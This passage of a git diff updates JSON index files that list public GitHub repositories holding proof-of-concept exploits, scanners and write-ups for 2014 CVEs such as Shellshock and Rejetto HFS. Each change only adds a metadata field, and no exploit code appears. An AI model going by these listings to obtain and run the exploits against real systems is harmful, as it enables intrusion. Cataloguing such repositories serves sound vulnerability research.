"https:\/\/avatars.githubusercontent.com\/u\/70061541?v=4", - "html_url": "https:\/\/github.com\/0xN7y" + "html_url": "https:\/\/github.com\/0xN7y", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xN7y\/CVE-2014-6271", "description": "EXPLOIT FOR CVE-2014-6271", @@ -2172,7 +2243,8 @@ "login": "MY7H404", "id": 100413372, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413372?v=4", - "html_url": "https:\/\/github.com\/MY7H404" + "html_url": "https:\/\/github.com\/MY7H404", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MY7H404\/CVE-2014-6271-Shellshock", "description": "The Shellshock Exploit is a tool designed to efficiently exploit the Shellshock vulnerability (CVE-2014-6271) in susceptible CGI servers, enabling a precise takeover of the target server. Shellshock is a critical security vulnerability that affects the Bash shell, allowing attackers to execute arbitrary commands on the targeted system", @@ -2207,7 +2279,8 @@ "login": "AlissonFaoli", "id": 129133392, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129133392?v=4", - "html_url": "https:\/\/github.com\/AlissonFaoli" + "html_url": "https:\/\/github.com\/AlissonFaoli", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/AlissonFaoli\/Shellshock", "description": "Shellshock exploit (CVE-2014-6271)", @@ -2237,7 +2310,8 @@ "login": "hackintoanetwork", "id": 83481196, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83481196?v=4", - "html_url": "https:\/\/github.com\/hackintoanetwork" + "html_url": "https:\/\/github.com\/hackintoanetwork", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hackintoanetwork\/shellshock", "description": "Python3 Shellshock (CVE-2014-6271) Scanner", @@ -2267,7 +2341,8 @@ "login": "ajansha", "id": 68161367, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68161367?v=4", - "html_url": "https:\/\/github.com\/ajansha" + "html_url": "https:\/\/github.com\/ajansha", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ajansha\/shellshock", "description": "Shelly is a lightweight and efficient vulnerability scanner designed to identify and mitigate Shellshock (CVE-2014-6271 & CVE-2014-7169) vulnerabilities in Bash environments.", @@ -2305,7 +2380,8 @@ "login": "K3ysTr0K3R", "id": 70909693, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", - "html_url": "https:\/\/github.com\/K3ysTr0K3R" + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2014-6271-EXPLOIT", "description": "A PoC exploit for CVE-2014-6271 - Shellshock", @@ -2352,7 +2428,8 @@ "login": "TheRealCiscoo", "id": 159902776, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/159902776?v=4", - "html_url": "https:\/\/github.com\/TheRealCiscoo" + "html_url": "https:\/\/github.com\/TheRealCiscoo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/TheRealCiscoo\/Shellshock-Exploit", "description": "Exploit para abusar de la vulnerabilidad Shellshock (CVE-2014-6271).", diff --git a/2014/CVE-2014-6287.json b/2014/CVE-2014-6287.json index a90bf996ee..546c3d0462 100644 --- a/2014/CVE-2014-6287.json +++ b/2014/CVE-2014-6287.json @@ -7,7 +7,8 @@ "login": "roughiz", "id": 9005615, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9005615?v=4", - "html_url": "https:\/\/github.com\/roughiz" + "html_url": "https:\/\/github.com\/roughiz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/roughiz\/cve-2014-6287.py", "description": "HttpFileServer httpd 2.3", @@ -37,7 +38,8 @@ "login": "Nicoslo", "id": 64541498, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64541498?v=4", - "html_url": "https:\/\/github.com\/Nicoslo" + "html_url": "https:\/\/github.com\/Nicoslo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Nicoslo\/Windows-exploitation-Rejetto-HTTP-File-Server-HFS-2.3.x-CVE-2014-6287", "description": null, @@ -67,7 +69,8 @@ "login": "wizardy0ga", "id": 90923369, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90923369?v=4", - "html_url": "https:\/\/github.com\/wizardy0ga" + "html_url": "https:\/\/github.com\/wizardy0ga", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/wizardy0ga\/THM-Steel_Mountain-CVE-2014-6287", "description": "A write up on the Steel Mountain box from TryHackMe.com and exploit for CVE-2014-6287", @@ -97,7 +100,8 @@ "login": "mrintern", "id": 24460340, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24460340?v=4", - "html_url": "https:\/\/github.com\/mrintern" + "html_url": "https:\/\/github.com\/mrintern", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mrintern\/thm_steelmountain_CVE-2014-6287", "description": "a python3 version of the exploit written for CVE-2014-6287. Useful for completing the \"Steel Mountain\" room on TryHackMe.com without the use of metasploit.", @@ -127,7 +131,8 @@ "login": "hadrian3689", "id": 71423134, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4", - "html_url": "https:\/\/github.com\/hadrian3689" + "html_url": "https:\/\/github.com\/hadrian3689", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hadrian3689\/rejetto_hfs_rce", "description": "CVE-2014-6287 Rejetto HFS 2.3", @@ -157,7 +162,8 @@ "login": "randallbanner", "id": 99814847, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99814847?v=4", - "html_url": "https:\/\/github.com\/randallbanner" + "html_url": "https:\/\/github.com\/randallbanner", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/randallbanner\/Rejetto-HTTP-File-Server-HFS-2.3.x---Remote-Command-Execution", "description": "CVE-2014-6287", @@ -187,7 +193,8 @@ "login": "0xTabun", "id": 144548207, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144548207?v=4", - "html_url": "https:\/\/github.com\/0xTabun" + "html_url": "https:\/\/github.com\/0xTabun", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xTabun\/CVE-2014-6287", "description": "Rejetto http File Server 2.3.x (Reverse shell)", @@ -217,7 +224,8 @@ "login": "zhsh9", "id": 78374754, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78374754?v=4", - "html_url": "https:\/\/github.com\/zhsh9" + "html_url": "https:\/\/github.com\/zhsh9", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zhsh9\/CVE-2014-6287", "description": "Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c", diff --git a/2014/CVE-2014-6332.json b/2014/CVE-2014-6332.json index cf4f489f2d..069772251a 100644 --- a/2014/CVE-2014-6332.json +++ b/2014/CVE-2014-6332.json @@ -7,7 +7,8 @@ "login": "MarkoArmitage", "id": 9991392, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9991392?v=4", - "html_url": "https:\/\/github.com\/MarkoArmitage" + "html_url": "https:\/\/github.com\/MarkoArmitage", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MarkoArmitage\/metasploit-framework", "description": " app \tturn nil publics and privates into blanks \t3 months ago \tconfig \tUse bundler\/setup for more graceful bundler related failures \t11 days ago \tdata \tAdd token fiddling from nishang \t12 hours ago \tdb \tRevert \"Diff triggering comment\" \t12 days ago \tdocumentation \tSwitch to Msf::OperatingSystems::Match::WINDOWS \t2 months ago \texternal \tUse PDWORD_PTR and DWORD_PTR \t29 days ago \tfeatures \tUp aruba timeout for simplecov overhead \t4 days ago \tlib \tCheck for load errors in reload_all \t4 days ago \tmodules \tLand #4255 - CVE-2014-6332 Internet Explorer \t19 hours ago \tplugins \tLand #3588, @tobd-r7's Fix SpaceBeforeModifierKeyword Rubocop warning \t4 months ago \tscript \trails generate cucumber:install \t3 months ago \tscripts \tdelete the old script \ta month ago \tspec \tRemove debug file writes \t2 days ago \ttest \tFix up comment splats with the correct URI \ta month ago \ttools \tFix bugs \t24 days ago \t.gitignore \tAdd note about rbenv for rvm .versions.conf local override \t24 days ago \t.gitmodules \tAdd RDI submodule, port Kitrap0d \ta year ago \t.mailmap \tAdd @trosen-r7's alias for commits \t6 months ago \t.rspec \tAdd modern --require to .rspec \t2 months ago \t.rubocop.yml \tReapply PR #4113 (removed via #4175) \t18 days ago \t.ruby-gemset \tRestoring ruby and gemset files \t6 months ago \t.ruby-version \tOh good, another Ruby version bump \t14 days ago \t.simplecov \tRemove fastlib \t2 months ago \t.travis.yml \tEnable fast_finish on travis-ci \t12 days ago \t.yardopts \tVarious merge resolutions from master <- staging \t4 months ago \tCONTRIBUTING.md \tAdd a don't to CONTRIBUTING about merge messages \t11 days ago \tCOPYING \tWith 66 days left in 2014, may as well update \ta month ago \tGemfile \tmetasploit-credential bump to 0.13.3 \t16 days ago \tGemfile.local.example \tVarious merge resolutions from master <- staging \t4 months ago \tGemfile.lock \tBump mdm version number \t12 days ago \tHACKING \tUpdate link for The Metasploit Development Environment \t5 months ago \tLICENSE \tRemove fastlib \t2 months ago \tREADME.md \tEncourage use of the installer for users. \t8 months ago \tRakefile \tMerge branch 'feature\/MSP-11130\/metasploit-framework-spec-constants' … \t24 days ago \tmetasploit-framework-db.gemspec \tmetasploit-credential bump to 0.13.3 \t16 days ago \tmetasploit-framework-full.gemspec \tUpdate metasploit-framework-full.gemspec \t23 days ago \tmetasploit-framework-pcap.gemspec \tDepend on metasloit-framework in optional gemspecs \t24 days ago \tmetasploit-framework.gemspec \tUpdate meterpreter_bins to 0.0.11 \t18 days ago \tmsfbinscan \tRemove fastlib \t2 months ago \tmsfcli \tFix thread-leaks in msfcli spec \t17 days ago \tmsfconsole \t@wvu-r7 is a skilled negotiator. s\/stdout\/stderr\/ \ta month ago \tmsfd \tRemove fastlib \t2 months ago \tmsfelfscan \tRemove fastlib \t2 months ago \tmsfencode \tRemove fastlib \t2 months ago \tmsfmachscan \tRemove fastlib \t2 months ago \tmsfpayload \tfixes merge conflicts msfpayload & exe \ta month ago \tmsfpescan \tRemove fastlib \t2 months ago \tmsfrop \tRemove fastlib \t2 months ago \tmsfrpc \tRemove fastlib \t2 months ago \tmsfrpcd \tRemove call to legacy db.sink queue, closes #4244 \t7 days ago \tmsfupdate \tAlways use maybe_wait_and_exit in msfupdate \ta year ago \tmsfvenom \tFix #4047 - undefined method `rank' due to an invalid encoder name \t19 days ago README.md ", @@ -37,7 +38,8 @@ "login": "tjjh89017", "id": 2821179, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2821179?v=4", - "html_url": "https:\/\/github.com\/tjjh89017" + "html_url": "https:\/\/github.com\/tjjh89017", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tjjh89017\/cve-2014-6332", "description": null, @@ -67,7 +69,8 @@ "login": "mourr", "id": 15272257, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15272257?v=4", - "html_url": "https:\/\/github.com\/mourr" + "html_url": "https:\/\/github.com\/mourr", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mourr\/CVE-2014-6332", "description": "CVE-2014-6332 ZeroDay POC - Starts PowerShell", diff --git a/2014/CVE-2014-6577.json b/2014/CVE-2014-6577.json index 2c0791886f..b60fe8cf92 100644 --- a/2014/CVE-2014-6577.json +++ b/2014/CVE-2014-6577.json @@ -7,7 +7,8 @@ "login": "SecurityArtWork", "id": 14791053, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14791053?v=4", - "html_url": "https:\/\/github.com\/SecurityArtWork" + "html_url": "https:\/\/github.com\/SecurityArtWork", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/SecurityArtWork\/oracle-xxe-sqli", "description": " Automated Oracle CVE-2014-6577 exploitation via SQLi", diff --git a/2014/CVE-2014-6598.json b/2014/CVE-2014-6598.json index 2c95c74e07..1f2436ce5b 100644 --- a/2014/CVE-2014-6598.json +++ b/2014/CVE-2014-6598.json @@ -7,7 +7,8 @@ "login": "KPN-CISO", "id": 6069290, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6069290?v=4", - "html_url": "https:\/\/github.com\/KPN-CISO" + "html_url": "https:\/\/github.com\/KPN-CISO", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/KPN-CISO\/DRA_writeup", "description": "Writeup of the Oracle DSR stack buffer overflow vulnerability (DRA) CVE-2014-6598", diff --git a/2014/CVE-2014-6721.json b/2014/CVE-2014-6721.json index 5855eb4273..f5d967427e 100644 --- a/2014/CVE-2014-6721.json +++ b/2014/CVE-2014-6721.json @@ -7,7 +7,8 @@ "login": "sagisar1", "id": 134386410, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134386410?v=4", - "html_url": "https:\/\/github.com\/sagisar1" + "html_url": "https:\/\/github.com\/sagisar1", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sagisar1\/CVE-2014-6721-exploit-Shellshock", "description": "exploit of the Shellshock vulnerability", diff --git a/2014/CVE-2014-7169.json b/2014/CVE-2014-7169.json index c0a19a4919..c55736ba70 100644 --- a/2014/CVE-2014-7169.json +++ b/2014/CVE-2014-7169.json @@ -7,7 +7,8 @@ "login": "chef-boneyard", "id": 20840233, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20840233?v=4", - "html_url": "https:\/\/github.com\/chef-boneyard" + "html_url": "https:\/\/github.com\/chef-boneyard", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/chef-boneyard\/bash-shellshock", "description": "DEPRECATED: Chef cookbook to audit & remediate \"Shellshock\" (BASH-CVE-2014-7169)", @@ -37,7 +38,8 @@ "login": "gina-alaska", "id": 326968, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/326968?v=4", - "html_url": "https:\/\/github.com\/gina-alaska" + "html_url": "https:\/\/github.com\/gina-alaska", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/gina-alaska\/bash-cve-2014-7169-cookbook", "description": null, @@ -67,7 +69,8 @@ "login": "Gobinath-B", "id": 81898167, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81898167?v=4", - "html_url": "https:\/\/github.com\/Gobinath-B" + "html_url": "https:\/\/github.com\/Gobinath-B", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Gobinath-B\/SHELL-SCHOCK", "description": "CVE-2014-7169 Shell Shock", diff --git a/2014/CVE-2014-7205.json b/2014/CVE-2014-7205.json index b3c2f9d61d..261b719e22 100644 --- a/2014/CVE-2014-7205.json +++ b/2014/CVE-2014-7205.json @@ -7,7 +7,8 @@ "login": "maximilianmarx", "id": 49280556, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49280556?v=4", - "html_url": "https:\/\/github.com\/maximilianmarx" + "html_url": "https:\/\/github.com\/maximilianmarx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/maximilianmarx\/bassmaster-rce", "description": "Exploiting CVE-2014-7205 by injecting arbitrary JavaScript resulting in Remote Code Execution.", @@ -37,7 +38,8 @@ "login": "AndrewTrube", "id": 53106750, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53106750?v=4", - "html_url": "https:\/\/github.com\/AndrewTrube" + "html_url": "https:\/\/github.com\/AndrewTrube", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/AndrewTrube\/CVE-2014-7205", "description": "Bassmaster Plugin NodeJS RCE", diff --git a/2014/CVE-2014-7236.json b/2014/CVE-2014-7236.json index 9541907f64..50f596896d 100644 --- a/2014/CVE-2014-7236.json +++ b/2014/CVE-2014-7236.json @@ -7,7 +7,8 @@ "login": "m0nad", "id": 772792, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/772792?v=4", - "html_url": "https:\/\/github.com\/m0nad" + "html_url": "https:\/\/github.com\/m0nad", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/m0nad\/CVE-2014-7236_Exploit", "description": "Exploit for CVE-2014-7236", diff --git a/2014/CVE-2014-7911.json b/2014/CVE-2014-7911.json index e78fd47f18..d05b36ed1a 100644 --- a/2014/CVE-2014-7911.json +++ b/2014/CVE-2014-7911.json @@ -7,7 +7,8 @@ "login": "retme7", "id": 5284280, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5284280?v=4", - "html_url": "https:\/\/github.com\/retme7" + "html_url": "https:\/\/github.com\/retme7", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/retme7\/CVE-2014-7911_poc", "description": "Local root exploit for Nexus5 Android 4.4.4(KTU84P)", @@ -37,7 +38,8 @@ "login": "ele7enxxh", "id": 9476237, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9476237?v=4", - "html_url": "https:\/\/github.com\/ele7enxxh" + "html_url": "https:\/\/github.com\/ele7enxxh", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ele7enxxh\/CVE-2014-7911", "description": null, @@ -67,7 +69,8 @@ "login": "heeeeen", "id": 1645206, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1645206?v=4", - "html_url": "https:\/\/github.com\/heeeeen" + "html_url": "https:\/\/github.com\/heeeeen", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/heeeeen\/CVE-2014-7911poc", "description": null, @@ -97,7 +100,8 @@ "login": "GeneBlue", "id": 10919709, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10919709?v=4", - "html_url": "https:\/\/github.com\/GeneBlue" + "html_url": "https:\/\/github.com\/GeneBlue", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/GeneBlue\/cve-2014-7911-exp", "description": "exploit for cve-2014-7911; android; java deserialization ;system privilege;ace;", @@ -127,7 +131,8 @@ "login": "koozxcv", "id": 15362158, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15362158?v=4", - "html_url": "https:\/\/github.com\/koozxcv" + "html_url": "https:\/\/github.com\/koozxcv", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/koozxcv\/CVE-2014-7911", "description": "vulnerabilities‘ Poc and Exploit", @@ -157,7 +162,8 @@ "login": "koozxcv", "id": 15362158, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15362158?v=4", - "html_url": "https:\/\/github.com\/koozxcv" + "html_url": "https:\/\/github.com\/koozxcv", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/koozxcv\/CVE-2014-7911-CVE-2014-4322_get_root_privilege", "description": "CVE-2014-7911 vulnerability and CVE-2014-4322 vulnerability to get root privilege!", @@ -187,7 +193,8 @@ "login": "mabin004", "id": 5842189, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5842189?v=4", - "html_url": "https:\/\/github.com\/mabin004" + "html_url": "https:\/\/github.com\/mabin004", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mabin004\/cve-2014-7911", "description": "exp for cve-2014-7911 which can get system privillage", diff --git a/2014/CVE-2014-7920.json b/2014/CVE-2014-7920.json index 6f48481fa1..a427118e96 100644 --- a/2014/CVE-2014-7920.json +++ b/2014/CVE-2014-7920.json @@ -7,7 +7,8 @@ "login": "laginimaineb", "id": 11378334, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11378334?v=4", - "html_url": "https:\/\/github.com\/laginimaineb" + "html_url": "https:\/\/github.com\/laginimaineb", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/laginimaineb\/cve-2014-7920-7921", "description": "Exploit code for CVE-2014-7920 and CVE-2014-7921 - code-exec in mediaserver up to Android 5.1", @@ -37,7 +38,8 @@ "login": "Vinc3nt4H", "id": 14606316, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14606316?v=4", - "html_url": "https:\/\/github.com\/Vinc3nt4H" + "html_url": "https:\/\/github.com\/Vinc3nt4H", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Vinc3nt4H\/cve-2014-7920-7921_update", "description": "cve-2014-7920-7921 exploit update", diff --git a/2014/CVE-2014-8110.json b/2014/CVE-2014-8110.json index 42b1409994..f261bb442f 100644 --- a/2014/CVE-2014-8110.json +++ b/2014/CVE-2014-8110.json @@ -7,7 +7,8 @@ "login": "tafamace", "id": 45160113, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45160113?v=4", - "html_url": "https:\/\/github.com\/tafamace" + "html_url": "https:\/\/github.com\/tafamace", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tafamace\/CVE-2014-8110", "description": null, diff --git a/2014/CVE-2014-8142.json b/2014/CVE-2014-8142.json index ce13ae058b..64a7691673 100644 --- a/2014/CVE-2014-8142.json +++ b/2014/CVE-2014-8142.json @@ -7,7 +7,8 @@ "login": "3xp10it", "id": 15134333, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15134333?v=4", - "html_url": "https:\/\/github.com\/3xp10it" + "html_url": "https:\/\/github.com\/3xp10it", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/3xp10it\/php_cve-2014-8142_cve-2015-0231", "description": "php_cve-2014-8142_cve-2015-0231的漏洞环境docker", diff --git a/2014/CVE-2014-8244.json b/2014/CVE-2014-8244.json index 2923b8c19e..c54f2fdd44 100644 --- a/2014/CVE-2014-8244.json +++ b/2014/CVE-2014-8244.json @@ -7,7 +7,8 @@ "login": "JollyJumbuckk", "id": 34014601, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34014601?v=4", - "html_url": "https:\/\/github.com\/JollyJumbuckk" + "html_url": "https:\/\/github.com\/JollyJumbuckk", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/JollyJumbuckk\/LinksysLeaks", "description": "Python3 script to scan for Linksys smart wifi devices that are vulnerable to CVE-2014-8244", diff --git a/2014/CVE-2014-8275.json b/2014/CVE-2014-8275.json index 58300366d7..142b655b8c 100644 --- a/2014/CVE-2014-8275.json +++ b/2014/CVE-2014-8275.json @@ -7,7 +7,8 @@ "login": "uthrasri", "id": 145666390, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", - "html_url": "https:\/\/github.com\/uthrasri" + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uthrasri\/Openssl_G2.5_CVE-2014-8275", "description": null, @@ -37,7 +38,8 @@ "login": "uthrasri", "id": 145666390, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", - "html_url": "https:\/\/github.com\/uthrasri" + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uthrasri\/CVE-2014-8275_openssl_g2.5", "description": null, diff --git a/2014/CVE-2014-8609.json b/2014/CVE-2014-8609.json index 3fbc9e4b80..8c161be4c6 100644 --- a/2014/CVE-2014-8609.json +++ b/2014/CVE-2014-8609.json @@ -7,7 +7,8 @@ "login": "locisvv", "id": 1533289, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1533289?v=4", - "html_url": "https:\/\/github.com\/locisvv" + "html_url": "https:\/\/github.com\/locisvv", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/locisvv\/Vulnerable-CVE-2014-8609", "description": null, @@ -37,7 +38,8 @@ "login": "MazX0p", "id": 54814433, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54814433?v=4", - "html_url": "https:\/\/github.com\/MazX0p" + "html_url": "https:\/\/github.com\/MazX0p", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MazX0p\/CVE-2014-8609-POC", "description": "pendingintent vulnerability", @@ -67,7 +69,8 @@ "login": "ratiros01", "id": 14090955, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14090955?v=4", - "html_url": "https:\/\/github.com\/ratiros01" + "html_url": "https:\/\/github.com\/ratiros01", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ratiros01\/CVE-2014-8609-exploit", "description": null, diff --git a/2014/CVE-2014-8682.json b/2014/CVE-2014-8682.json index 9dc3db8f41..4564b00bba 100644 --- a/2014/CVE-2014-8682.json +++ b/2014/CVE-2014-8682.json @@ -7,7 +7,8 @@ "login": "nihal1306", "id": 6605890, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6605890?v=4", - "html_url": "https:\/\/github.com\/nihal1306" + "html_url": "https:\/\/github.com\/nihal1306", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nihal1306\/gogs", "description": "CVE-2014-8682", diff --git a/2014/CVE-2014-8729.json b/2014/CVE-2014-8729.json index 555436c097..a408ac2d3b 100644 --- a/2014/CVE-2014-8729.json +++ b/2014/CVE-2014-8729.json @@ -7,7 +7,8 @@ "login": "inso-", "id": 6376377, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6376377?v=4", - "html_url": "https:\/\/github.com\/inso-" + "html_url": "https:\/\/github.com\/inso-", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/inso-\/TORQUE-Resource-Manager-2.5.x-2.5.13-stack-based-buffer-overflow-exploit-CVE-2014-8729-CVE-2014-878", "description": "TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow exploit CVE-2014-8729; CVE-2014-878", diff --git a/2014/CVE-2014-8731.json b/2014/CVE-2014-8731.json index 3d33055445..d4225f5180 100644 --- a/2014/CVE-2014-8731.json +++ b/2014/CVE-2014-8731.json @@ -7,7 +7,8 @@ "login": "sbani", "id": 3541652, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3541652?v=4", - "html_url": "https:\/\/github.com\/sbani" + "html_url": "https:\/\/github.com\/sbani", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sbani\/CVE-2014-8731-PoC", "description": "CVE-2014-8731 - PHPMemcachedAdmin RCE - Proof of Concept", diff --git a/2014/CVE-2014-8757.json b/2014/CVE-2014-8757.json index 7b1a822e05..9f1968e1a2 100644 --- a/2014/CVE-2014-8757.json +++ b/2014/CVE-2014-8757.json @@ -7,7 +7,8 @@ "login": "irsl", "id": 6357121, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6357121?v=4", - "html_url": "https:\/\/github.com\/irsl" + "html_url": "https:\/\/github.com\/irsl", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/irsl\/lgosp-poc", "description": "LG On Screen Phone authentication bypass PoC (CVE-2014-8757)", diff --git a/2014/CVE-2014-9016.json b/2014/CVE-2014-9016.json index ca364cbd44..96ea23ff5d 100644 --- a/2014/CVE-2014-9016.json +++ b/2014/CVE-2014-9016.json @@ -7,7 +7,8 @@ "login": "c0r3dump3d", "id": 5602401, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5602401?v=4", - "html_url": "https:\/\/github.com\/c0r3dump3d" + "html_url": "https:\/\/github.com\/c0r3dump3d", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/c0r3dump3d\/wp_drupal_timing_attack", "description": "Python scripts to exploit CVE-2014-9016 and CVE-2014-9034", @@ -37,7 +38,8 @@ "login": "Primus27", "id": 47760587, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47760587?v=4", - "html_url": "https:\/\/github.com\/Primus27" + "html_url": "https:\/\/github.com\/Primus27", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Primus27\/WordPress-Long-Password-Denial-of-Service", "description": "Exhaust WordPress